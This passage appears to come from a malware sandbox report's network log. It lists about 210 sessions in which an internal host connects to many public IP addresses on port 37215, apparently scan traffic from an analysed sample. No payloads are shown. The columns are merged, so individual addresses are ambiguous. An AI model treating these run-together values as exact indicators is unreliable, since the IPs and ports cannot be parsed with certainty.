                                                  3081192.168.2.135114841.252.55.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3082192.168.2.134683685.217.134.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3083192.168.2.1360330157.38.61.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3084192.168.2.1358904197.37.207.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3085192.168.2.1347738197.24.158.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3086192.168.2.134369041.13.181.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3087192.168.2.134908041.36.94.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3088192.168.2.1358850157.120.41.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3089192.168.2.1335102157.249.92.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3090192.168.2.135700241.182.57.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3091192.168.2.1353648157.95.8.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3092192.168.2.1348606197.65.114.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3093192.168.2.1343978140.153.135.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3094192.168.2.136065262.21.36.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3095192.168.2.1351434197.66.36.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3096192.168.2.1352198197.121.140.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3097192.168.2.1357230197.214.201.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3098192.168.2.135981841.47.119.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3099192.168.2.1356612157.71.210.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3100192.168.2.1351112197.121.102.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3101192.168.2.1343946197.135.146.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3102192.168.2.1333016197.2.42.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3103192.168.2.1360978176.43.190.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3104192.168.2.1344496218.43.172.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3105192.168.2.133663041.117.5.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3106192.168.2.1354586157.161.151.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3107192.168.2.1360820143.47.229.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3108192.168.2.1354052197.236.117.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3109192.168.2.136024439.70.218.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3110192.168.2.1337662135.87.135.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3111192.168.2.1360908157.78.191.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3112192.168.2.1333480167.66.116.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3113192.168.2.134898841.31.178.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3114192.168.2.1344150144.174.138.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3115192.168.2.1344548103.145.71.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3116192.168.2.1351740157.125.53.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3117192.168.2.1342400157.168.89.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3118192.168.2.134291041.189.183.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3119192.168.2.1336018197.27.229.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3120192.168.2.1358678157.209.76.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3121192.168.2.135390841.80.74.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3122192.168.2.1344002157.0.162.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3123192.168.2.133363041.100.48.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3124192.168.2.134820441.95.106.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3125192.168.2.133862641.152.199.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3126192.168.2.1344370157.16.66.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3127192.168.2.1348904220.141.0.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3128192.168.2.1356892197.30.63.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3129192.168.2.1352920119.179.40.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3130192.168.2.1334860119.229.131.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3131192.168.2.1339236157.118.125.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3132192.168.2.1343968157.107.220.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3133192.168.2.1357152197.182.163.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3134192.168.2.133825641.152.109.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3135192.168.2.1342874197.22.86.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3136192.168.2.1355778197.22.4.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3137192.168.2.134324441.109.217.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3138192.168.2.1360956197.124.233.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3139192.168.2.135239441.60.28.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3140192.168.2.134120241.157.113.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3141192.168.2.133854041.105.197.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3142192.168.2.134607841.227.103.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3143192.168.2.135958241.89.114.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3144192.168.2.1343980197.184.229.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3145192.168.2.1350242157.253.136.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3146192.168.2.133563241.126.111.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3147192.168.2.135658835.18.231.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3148192.168.2.1335886157.165.153.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3149192.168.2.135070241.11.152.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3150192.168.2.1353006197.163.118.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3151192.168.2.13546102.144.186.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3152192.168.2.1349658157.47.7.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3153192.168.2.1341066157.201.181.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3154192.168.2.133750641.45.104.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3155192.168.2.1343856197.159.57.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3156192.168.2.1352560116.204.194.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3157192.168.2.1334312104.197.248.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3158192.168.2.1337102113.255.121.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3159192.168.2.1337024197.186.172.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3160192.168.2.1347838157.159.112.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3161192.168.2.1348172157.171.77.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3162192.168.2.135480441.113.142.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3163192.168.2.133725641.158.205.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3164192.168.2.135540241.174.38.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3165192.168.2.1344066199.70.216.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3166192.168.2.1340116197.77.217.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3167192.168.2.1349492157.19.227.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3168192.168.2.134416641.144.240.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3169192.168.2.134027868.120.59.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3170192.168.2.1346826157.164.107.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3171192.168.2.135728834.228.13.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3172192.168.2.135801841.87.65.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3173192.168.2.1357720157.98.242.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3174192.168.2.134453041.45.13.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3175192.168.2.1356872157.71.92.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3176192.168.2.133651832.88.170.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3177192.168.2.1336240197.80.126.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3178192.168.2.1345534197.244.39.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3179192.168.2.1348532157.140.92.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3180192.168.2.133282841.204.218.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3181192.168.2.1333276157.228.210.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3182192.168.2.1341400197.172.21.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3183192.168.2.1334724157.243.210.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3184192.168.2.135049441.116.66.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3185192.168.2.133400841.212.98.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3186192.168.2.133303641.196.35.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3187192.168.2.135265241.38.105.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3188192.168.2.1358050157.65.237.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3189192.168.2.1334812157.93.28.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3190192.168.2.1354498157.233.234.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3191192.168.2.1337516197.174.72.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3192192.168.2.133718041.205.164.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3193192.168.2.1341226157.104.152.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3194192.168.2.1343706157.7.174.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3195192.168.2.1353410197.211.83.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3196192.168.2.134349441.121.182.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3197192.168.2.1333618197.12.16.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3198192.168.2.1337444197.82.25.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3199192.168.2.1359054157.175.189.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3200192.168.2.1348458221.64.197.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3201192.168.2.1340042197.70.142.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3202192.168.2.13335162.17.202.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3203192.168.2.1339090157.50.84.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3204192.168.2.1350606157.3.14.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3205192.168.2.136079290.96.210.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3206192.168.2.1335812110.64.37.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3207192.168.2.1337482157.223.69.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3208192.168.2.134435888.38.52.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3209192.168.2.135349466.195.184.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3210192.168.2.1358066197.58.68.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3211192.168.2.1336896197.219.229.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3212192.168.2.134808624.159.5.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3213192.168.2.1352800183.77.223.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3214192.168.2.1359484157.75.166.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3215192.168.2.134427841.229.182.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3216192.168.2.133904841.111.77.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3217192.168.2.1354926157.206.223.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3218192.168.2.134462838.59.237.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3219192.168.2.1345276197.150.12.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3220192.168.2.1356526104.52.222.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3221192.168.2.133552041.93.233.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3222192.168.2.1337392197.148.178.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3223192.168.2.1339046157.100.189.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3224192.168.2.1333936197.34.57.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3225192.168.2.133862897.219.167.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3226192.168.2.1353756136.154.111.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3227192.168.2.1355848157.5.19.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3228192.168.2.1342808160.62.159.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3229192.168.2.134729641.160.248.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3230192.168.2.1359530157.73.221.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3231192.168.2.134895641.180.239.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3232192.168.2.133890841.70.165.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3233192.168.2.1355318143.32.26.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3234192.168.2.1358496195.2.187.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3235192.168.2.1357598142.17.69.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3236192.168.2.1344960157.165.111.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3237192.168.2.133802253.168.96.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3238192.168.2.1360222197.181.214.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3239192.168.2.1345508157.243.12.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3240192.168.2.1351718157.176.138.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3241192.168.2.1335490197.62.243.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3242192.168.2.1333876197.201.34.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3243192.168.2.134386841.158.48.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3244192.168.2.1359512157.243.226.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3245192.168.2.1338232161.219.143.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3246192.168.2.1359056197.145.248.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3247192.168.2.1359160157.142.92.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3248192.168.2.135256441.129.116.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3249192.168.2.133686241.241.204.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3250192.168.2.134613241.4.105.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3251192.168.2.13462082.60.236.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3252192.168.2.13395164.64.107.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3253192.168.2.133616841.141.21.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3254192.168.2.1350758208.95.229.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3255192.168.2.135229262.110.147.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3256192.168.2.1350280197.22.102.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3257192.168.2.1353054197.31.179.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3258192.168.2.1343254157.7.171.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3259192.168.2.1357440157.36.101.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3260192.168.2.1341564197.55.114.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3261192.168.2.1351596157.143.91.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3262192.168.2.134174441.179.103.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3263192.168.2.1359258157.56.208.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3264192.168.2.1335692197.31.187.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3265192.168.2.1344768157.112.196.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3266192.168.2.1352986197.80.24.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3267192.168.2.135666041.247.83.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3268192.168.2.1353388157.223.150.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3269192.168.2.1336070197.5.79.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3270192.168.2.1359946157.26.218.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3271192.168.2.136075841.105.166.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3272192.168.2.133309844.32.140.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3273192.168.2.1336240197.88.205.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3274192.168.2.133347241.156.168.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3275192.168.2.1356840157.132.225.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3276192.168.2.1341902197.108.108.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3277192.168.2.1341566108.41.165.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3278192.168.2.1335308157.91.149.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3279192.168.2.1346788157.230.255.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3280192.168.2.133538841.217.118.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3281192.168.2.136013423.160.42.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3282192.168.2.1352148197.110.95.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3283192.168.2.135701641.14.1.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3284192.168.2.1337250146.147.230.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3285192.168.2.135097227.23.46.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3286192.168.2.1335808197.83.208.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3287192.168.2.134627041.113.55.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3288192.168.2.1351918157.169.220.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3289192.168.2.1359930143.44.58.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3290192.168.2.1349498197.101.126.24937215
